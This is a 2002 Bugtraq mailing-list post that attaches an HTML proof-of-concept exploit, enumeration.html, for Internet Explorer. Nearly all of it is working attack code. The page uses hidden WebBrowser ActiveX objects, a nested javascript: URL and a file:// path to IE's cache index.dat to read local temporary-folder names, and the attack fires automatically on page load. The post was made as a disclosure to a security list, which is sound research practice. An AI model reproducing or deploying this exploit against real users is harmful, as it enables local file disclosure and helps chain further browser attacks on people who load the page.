[27008] in bugtraq
the attachement
daemon@ATHENA.MIT.EDU (jelmer)
Thu Sep 12 12:12:26 2002
Message-ID: <001e01c25a01$512a77c0$9e00000a@pluto>
From: "jelmer" <jkuperus@xs4all.nl>
To: <bugtraq@securityfocus.com>
Date: Thu, 12 Sep 2002 04:08:42 +0200
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
This is the enumeration.html file mentioned , apperntly it caused my message
to get rejected over and over
If someone could include it in the original "leveraging cross proto.." text
i'd be much obliged
<html>
<body onload="test()">
<script language="vbscript">
Sub extractPaths(filename)
set xmlHTTP = CreateObject("Microsoft.XMLHTTP")
xmlHTTP.open "GET",filename,false
xmlHTTP.send
contents = xmlHTTP.responseBody
for i = 0 to 7
folder = ""
for j = 81 + (i*12) to 88 + (i*12)
thischarcode = ascb(midb(contents,j,1))
folder = folder & chr(thischarcode)
next
msgbox mid(filename,1,len(filename)-9) + folder
next
end sub
</script>
<script language="javascript">
document.writeln('<object id=a
classid=clsid:EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B width=0 height=0>');
document.writeln('<PARAM NAME=Location
VALUE="javascript:document.writeln("<object id=b
classid=clsid:EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B width=0 height=0><PARAM
NAME=Location
VALUE=file:///::{450D8FBA-AD25-11D0-98A8-0800361B1103}/../Local%20Settings/T
emporary%20Internet%20Files/Content.IE5/index.dat></object>");');
document.writeln('</object>');
function test() {
setTimeout(
function () {
elb = document.getElementById('b');
var matcher = new RegExp('<PARAM.NAME=.Location..VALUE=.*#([^\\"]*).>');
extractPaths(matcher.exec(elb.innerHTML)[1]);
},
2000
);
}
</script>
</body>
</html>
